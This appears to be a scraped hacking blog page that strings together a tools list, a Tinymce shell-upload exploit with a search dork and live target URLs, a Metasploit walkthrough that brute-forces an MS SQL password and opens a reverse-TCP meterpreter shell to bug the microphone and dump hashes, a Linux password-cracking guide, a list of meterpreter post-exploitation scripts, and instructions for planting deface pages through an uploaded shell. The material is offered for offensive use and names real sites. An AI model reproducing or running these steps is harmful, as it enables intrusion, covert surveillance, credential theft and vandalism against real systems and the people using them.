TOP 14 TOOLS THAT ETHICAL HACKER MUST HAVE !!!

Here is the List of tools that ethical HACKER must have a range of systems. These tools  are basically to reveal information which further results in a specific attacks on a given system. To locate weaknesses or error in a target system to gain as muchas information as possible about that network.

These tools Contains vulnerability scanning,  real exploits, Denial of Service, buffer overflow attacks and a wide range of networking integrated advanced utilities to perform such tests.

 .

.

Tools that ethical HACKER must have :

 .

1 – Nmap:

Nmap is used to scan addresses (IPV6 included), This tool is developed to gather a massive amount of information about the victim. It can scan open ports and much more.

This tool includes various scanning techniques e.g TCP connect(), UDP, TCP SYN (half open), Null scan, ACK sweep, Xmas Tree, FIN,  ICMP (ping sweep), ftp proxy (bounce attack), TCP SYN (half open),  IP Protocol, ICMP (ping sweep) and SYN sweep.

 .

2 – Wireshark:

This is very powerful tool for analysis and network troubleshooting. Wireshark is capable to view data from Live networking. It support media formats and hundreds of protocols. It is also used for development and education. Most Unix vendors and Linux supply their own Wireshark packages.

 .

3 – Cain & Able:

This tool is proven it’s self revolutionary in cyber mafia. It is capable of cracking passwords, several password retrieval jobs, routing/analyzing protocols and sniffing networks. Unlikly most of the tools it is just windows-only and is a twist to forensic tools & modern penetration testing.

 .

.

4 – MetaSploit:

MetaSploit is powerful network analysis and security tool. It is mostly used for penetration attacks because of it’s easily gathering information of victim and clean-interfacing technique.

 .

5 – Ettercap:

It is used for Man in the middle attack (MITM), these attacks are on Local area networks. It sniffs live connections & also got content filtering techniques. It has many features of host analysis and networking while it supports both active and passive dissections of various protocols.

 .

6 – Nessus:

This Tool provides vulnerability analysis of networks, asset profiling, high-speed data discovery and configuration auditing.

 .

7 – Havij:

Havij is most used testing tool for SQL injection and many other injections. It has features of database retrieval,  site’s scanning, password cracking and admin look-up. Basic purpose of it is to find  vulnerable websites and  breeze to hack.

.

8 – Kismet:

Kismet is 802.11 layer2 sniffer, wireless network detector and intrusion detection system. It supports every wireless card and can work with any appropriate hardware  on raw monitoring (rfmon) mode. Kismet supports plugin that can sniff media such as DECT. It can sniff  802.11a, 802.11n,  802.11b, sniff802.11g and traffic.

 .

9 – BackTrack Linux:

Backtrack is most popular and widely used tool bootable on CD of Linux Distro. It has got a large variety of penetration testing tools, VOIP networks, network attacks and many more testing/attacking of websites and systems. This tool is most user friendly because of its helpful and useful layout.

.

 .

10 – W3af:

W3af also known as web-focused Metasploit is an extremely flexible, popular, powerful & framework for finding vulnerabilities in exploiting web application. It’s vast features got dozens of exploitation and web assessment plugins.

 .

11 – Encase:

EnCase is computer forensics software mostly used by law enforcement agencies. Because of it’s vast usage and popularity it is forensics in a  a de-facto standard. This tool is being made to gather data from a computer in a forensically sound manner.

 .

12 – Helix:

Helix is bootable Ubuntu CD which contains multiple tools involving file systems, images, cellphones, computers & tied in to sheer power, it is very user friendly.

 .

13 – Acunetix:

Acunetix is Strong tool in website security purpose. It has variety of features for testing a website for various injections. Acunetix WVS basically checks the vulnerabilities of website, either XSS, SQL or other Injection are possible or not.

 .

14 – Burp Suite:

This tool is designed for performing testing regarding security of web applications. It  is an integrated platform and got various tools working togather to make a complete testing process. This tools is also used for exploiting security vulnerabilities & analysis of application attack surface from initial mapping.

.

.

The Penetration Test Process

• Discovery: The process Penetration tests is a Discovery in variety of techniques e.g  scan utilities, databases, Google data & much more to get as much information about the target as possible. These discoveries are basically to reveal sensitive information which further results in a specific attacks on a given system.

• Enumeration: After discovery of systems and specific networks the next step is to gain as much as information as possible about that network. The diffrence b/w Discovery & Enumeration depends upon state of intrusion. Enumeration task is to get reletive information about username while software and hardware version information are also obtained form it.

• Vulnerability Identification: This is most important step in penetration testing. In vulnerability identification you have to locate the week spot of target system. To locate weaknesses or error in a target system is must needed because after that you will get to know where to launch an attack.

• Exploitation and Launching of Attacks: After vulnerability has been located and you have identified the target’s weekspot now it is possible to launch the exploits. The main purpose of launching exploits is to get full access on victims’s system.

• Denial of Service: This term is known as dDos (Denial of Service). This is used to check the stability of the systems either it is crashed or not. It is good habit to check the strenght or stability of a system, before the real environment attack is being made.

Reporting: This is just for educational purpose. Now after you have completed penetration test it is recomended to get user customized  for technical overview, This includes detailed recommendations, executive summary, identified vulnerabilities & other security ID numbers. These reports may be in various forms i.e pdf, html, xml etc. while every report must be modified by user’s choice.

Read More

Tinymce PHP file Manager, Remote File upload vulnrablity

Title :Tinymce PHP file Manager, Remote File upload vulnrablity               server : Linux
Author: NoentryPHC 
Type : webapp Exploit  
Hamr : remote shell upload  
Dork : inurl:/file_manager.php?type=img..

Goto google.com and type dork inurl:/file_manager.php?type=img & inurl:/file_manager.php?type=file to FinD vulnrable websites, to get more sites you can modify this dork, Exploit Patch : http://www.site.com/directory/tinymce/file_manager.php?type=file  so Goto http://www.site.com/directory/tinymce/file_manager.php?type=file  and upload your file there, if php & html uploading is denided, you can try Tamper Data and Live Http Headers 

Live demo : http://piter-ka.ru/media/tinymce/file_manager.php?type=file http://www.oki-iroda.hu/72h2010/tinymce/jscripts/file_manager.php?type=img 

Read More

How to change the administrator password without knowing the current one? 

METHOD 1.

1. GO TO CONTROL PANEL

2. CLICK ON " ANDMINISTRATIVE TOOLS"

3. NOW CLICK ON " COMPUTER MANAGEMENT "

                     

     OR

 

 siMPLY RIGHT click on my computer and click on manage

4. NOW GO TO SYSTEM TOOLS

5. DOUBLE CLICK ON LACAL USERS AND GROUPS

6. THEN FINALLY UNDER USERS U WILL SEE ALL THE USER ACCOUNTS INCLUDING ADMIN ACCOUNT.

7. NOW RIGHT CLICK ON ADMINISTRATOR AND CLICK SET PASSWO

8. IT Wont ask YOu for the previous password 

 THATS IT we aRE DONE .... ENJOY

METHOD 2.

1 . Press R by holding windows button

                    or 

or simply open run

2. AFTER OPENNING TYPE THIS

"lusrmgr.msc"

 

2. Click right and  double Click on user and u will see all users present in that pc .!!

  

4.Now right click on the account on which you want to change the password .when you click on set  password then it will permission click on proceed and u r done

 

 

 

 

 

 

Read More

How to Hack Databases: Cracking SQL Server Passwords & Owning the Server

How to Hack Databases: Cracking SQL Server Passwords 
& Owning the Server
 
In this tutorial, we'll look at how we can crack the password 
on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.

Step 1: Start Metasploit

First, we need to start Metasploit. Once we have the 
metasploit command prompt, we need to define which 
module we want to use. 
In past Metasploit tutorials, we've always used exploits, 
but this one is a bit different. Instead, we will use a  
scanner  among the auxiliary modules that enables us
 to brute force 
the sa password. Let's load up mssql_login:

• use scanner/mssql/mssql_login

 

 

 

 


As you can see, Metasploit responds by telling us we have successfully loaded this auxiliary 


module. Now let's take a look at the options with this module.

• show options

Step 2: Set Your Options

In order to run this MS SQL login module, we will need:

1. A password file,
2. Set the RHOSTS, and
3. Determine the number of THREADS we want to run.

BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 c

ommonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, 

our target is at 192.168.1.103, and we will set our THREADS to 20.

 

Step 3: Brute Force the Database Passwords

Now, we simply need to type exploit and it runs through password list until it finds the password

 for the sa account.

• exploit
•  

 

As you can see, after testing over 57,000 passwords (it takes a few minutes, so be patient),

 it found the password on our sa account of "NullByte". Success! Now we have full sysadmin 

privileges on the database that we can hopefully convert to full system sysadmin privileges.

 

Step 4: Grab the xp__cmdshell

Now that we have full sysadmin (sa) on the MS SQL database, we are going to leverage that

 to full system sysadmin privileges. MS SQL Server has a stored procedure named xp_cmdshell t

hat enables the sa account to gain a system command shell with full system admin rights. If we can i

nvoke that command shell, we may be able to load the payload of our choice on the system and 

own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this.

 Let's load it.

• use windows/mssql/mssql_payload
•  

 

Now, let's check the options for this exploit:

• show options

In this case, we will try to load the meterpreter on this system, so let's:

• set PAYLOAD windows/meterpreter/reverse_tcp

In addition, we need to set the LPORT, the LHOST, the RHOST and the password we

 recovered from the sa account from above, in this case, "NullByte".

 

Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.

 

Success! We have a meterpreter session!

 

 

Step 5: Wreak Havoc!

Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, 

we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's

 try a few.

First, let's turn on the microphone and listen in on the conversations of the sysadmin and anyone

 else in the room. Think of it as installing a bug in the room from the old James Bond 007 movies.

• meterpreter > run sound_recorder -i 100 -l /etc

 

This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etc 

directory. Of course, we can record as much audio as we want. We are only limited by hard drive 

space.

 

Step 6: Grab the Hash

Now, let's grab some passwords so that we can log back back in whenever we please. Remember,
 once we have the admin password, we can login any time with Metasploit's psexec exploit.

• meterpreter > hashdump

As you can see, we were able to grab the password hashes from the system
.

We then need to either crack the hashes using John the Ripper,


FEEL FREE TO COMMENT<LIKE< ASK QUESTIONS.....

Read More

How to Crack User Passwords in a Linux System

How to Crack User Passwords in a Linux System

In this article, we'll look at how to grab the password hashes from a Linux system and 
crack the hashes using probably the most widely used password cracking tool out there,  
John the Ripper.

Let's boot up BackTrack and get hacking!

Where Linux Passwords Are Stored

Linux passwords are stored in the /etc/passwd file in cleartext in older systems and in 

/etc/shadow file in hash form on newer systems. We should expect that the passwords on

 anything other than old legacy systems to be stored in /etc/shadow.

Step 1: Create Some User Accounts

Since our BackTrack system probably doesn't have many users on it other than our root

 account, let's go ahead and create a couple more accounts.
Let's create user1 with password "flower" and user2 with a password of "hacker".

 

I've purposely chosen dictionary words as the complexity of the password is inversely related

 to the time necessary to crack it. One of the nice features of John the Ripper is that it will try to

 use a dictionary attack first. If that fails, it will try a hybrid attack. And only if that fails will it 

attempt a brute-force attack, which is the most time consuming.

Step 2: Open John the Ripper

Now that we have a couple of regular users in our system with simple passwords, we now need

 to open John the Ripper. John the Ripper is a simple, but powerful password cracker without a 

GUI (this helps to make it faster as GUIs consume resources).

We can access it from BackTrack by going to the BackTrack button on the bottom left, then 

Backtrack, Privilege Escalation, Password Attacks, Offline Attacks, and finally select   

John the Ripper from the multiple password cracking tools available.

 

If you selected the correct menu item, it will open a terminal that looks like this.

 

By the way, feel free to close our previous terminal as we're finished with it.

Step 3: Test John the Ripper

At the prompt, type:

• bt > john -test

This command will send John the Ripper through a variety of benchmark tests to estimate how 

long it will take to break the passwords on your system. Your terminal will look something like this.

 

Now that John has estimated how long each of the encryption schemes will take to crack, let's

 put him to work on cracking our passwords.

Step 4: Copy the Password Files to Our Current Directory

Linux stores its passwords in /etc/shadow, so what we want to do is copy this file to our 

current directory along with the /etc/passwd file, then "unshadow" them and store them in

 file we'll call passwords. So, let's type both:

• bt > cp /etc/shadow ./

• bt > cp /etc/passwd ./

 

In Linux, the cp command means copy and the ./ represents our current directory. So this 

command says, copy the contents of /etc/shadow to my current directory. We do the same for

 the /etc/ passwd file.

Step 5: Unshadow

Next we need to combine the information in the /etc/shadow and the /etc/passwd files, so that 

John can do its magic.

• bt > ./unshadow passwd shadow > passwords

Step 6: Crack!

Now that we have unshadowed the critical files, we can simply let John run on our password file.

• bt > john passwords

John the Ripper will proceed to attempt to crack your passwords. As you can see, it cracked

 all three of ours in a matter of seconds! Of course, more complex passwords will take significantly
 more time, but all we need is just one user with a simple password and we have access to the
 account in seconds.

It's also important to note that any password cracker is only as good as its word list. For more c

omplex or hybrid passwords, you probably want to use a password list containing far more
 passwords, including hybrid passwords such "p@$$w0rd" that combine special characters into
 words.



We'll be doing more password cracking among numerous other hacks, so keep coming back!
And if you have any questions, feel free to comment below

Read More

The Ultimate List of Hacking Scripts for Metasploit's Meterpreter

Please note that new meterpreter scripts are being developed every day. This list attempts to provide you with a complete list of scripts as of this writing. If you find errors or typos, please feel free to post them here, so I will try correct them as soon as humanly possible.

Script Commands with Brief Descriptions

• arp_scanner.rb - Script for performing an ARP's Scan Discovery.
• autoroute.rb - Meterpreter session without having to background the current session.
• checkvm.rb - Script for detecting if target host is a virtual machine.
• credcollect.rb - Script to harvest credentials found on the host and store them in the database.
• domain_list_gen.rb - Script for extracting domain admin account list for use.
• dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
• duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
• enum_chrome.rb - Script to extract data from a chrome installation.
• enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
• enum_putty.rb - Enumerates Putty connections.
• enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
• enum_vmware.rb - Enumerates VMware configurations for VMware products.
• event_manager.rb - Show information about Event Logs on the target system and their configuration.
• file_collector.rb - Script for searching and downloading files that match a specific pattern.
• get_application_list.rb - Script for extracting a list of installed applications and their version.
• getcountermeasure.rb - Script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. Provides also the option to kill the processes of detected products and disable the built-in firewall.
• get_env.rb - Script for extracting a list of all System and User environment variables.
• getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
• getgui.rb - Script to enable Windows RDP.
• get_local_subnets.rb - Get a list of local subnets based on the host's routes.
• get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
• gettelnet.rb - Checks to see whether telnet is installed.
• get_valid_community.rb - Gets a valid community string from SNMP.
• getvncpw.rb - Gets the VNC password.
• hashdump.rb - Grabs password hashes from the SAM.
• hostedit.rb - Script for adding entries in to the Windows Hosts file.
• keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
• killav.rb - Terminates nearly every antivirus software on victim.
• metsvc.rb - Delete one meterpreter service and start another.
• migrate - Moves the meterpreter service to another process.
• multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vistaand Windows XP and Windows 2008 targets.
• multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
• multi_meter_inject.rb - Script for injecting a reverce tcp Meterpreter Payload into memory of multiple PIDs, if none is provided a notepad process will be created and a Meterpreter Payload will be injected in to each.
• multiscript.rb - Script for running multiple scripts on a Meterpreter session.
• netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
• packetrecorder.rb - Script for capturing packets in to a PCAP file.
• panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
• persistence.rb - Script for creating a persistent backdoor on a target host.
• pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
• powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as system in order to work properly. This has currently been tested on Server 2008 and Windows 7, which installs PowerShell by default.
• prefetchtool.rb - Script for extracting information from windows prefetch folder.
• process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
• remotewinenum.rb - This script will enumerate windows hosts in the target environment given a username and password or using the credential under which Meterpeter is running using WMI wmic windows native tool.
• scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
• schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
• schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. Using schtasks command to run them as system. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
• scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
• screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
• screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
• screen_dwld.rb - Script that recursively search and download files matching a given pattern.
• service_manager.rb - Script for managing Windows services.
• service_permissions_escalate.rb This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
• sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.
• srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
• uploadexec.rb - Script to upload executable file to host.
• virtualbox_sysenter_dos - Script to DoS Virtual Box.
• virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
• vnc.rb - Meterpreter script for obtaining a quick VNC session.
• webcam.rb - Script to enable and capture images from the host webcam.
• win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
• win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
• winbf.rb - Function for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment.
• winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
• wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.

Read More

How To Make 404 Pages in Defaced websites by Using shell

How To Make 404 Pages in Defaced websites by Using shell

What are 404 pages ? 

its a page or file which is no longer available on website,

Advantages of 404 pages in website Defacing :

if someone will trying to acess to your shell by guessing like (c99.php, r57.php etc) then it will show your custom page on Not found Link.

in Defaced site usually we upload our deface page as index.html or anyname.html

and we can see our deface page on That custom link only where we uploaded our deface page 

like : site.com/index.html, site.com/r00t.html site.com/r00t.php

by adding deface page's code in 404 page you can see your deface page on every link 

like site.com/xyz.php site.com/x.html site.com/xyz/, 

How to do it ?

1-open Note Pad

2- paste your deface page's code in noatepad

3- save file as 404.shtml 

5- now upload this file in public_html/ directory using shell

now check any error link !!

Code for 404 Pages :

<style type="text/css">body { background-color: #000;}</style>
<img src="http://a3.sphotos.ak.fbcdn.net/hphotos-ak-snc7/s720x720/432146_157462177702828_100003171391108_222151_895998112_n.jpg" width="1198" height="765" />
(replace image link with your own image in this code)

 JOIN MY SITE TO GET LATEST UPDATE 

Read More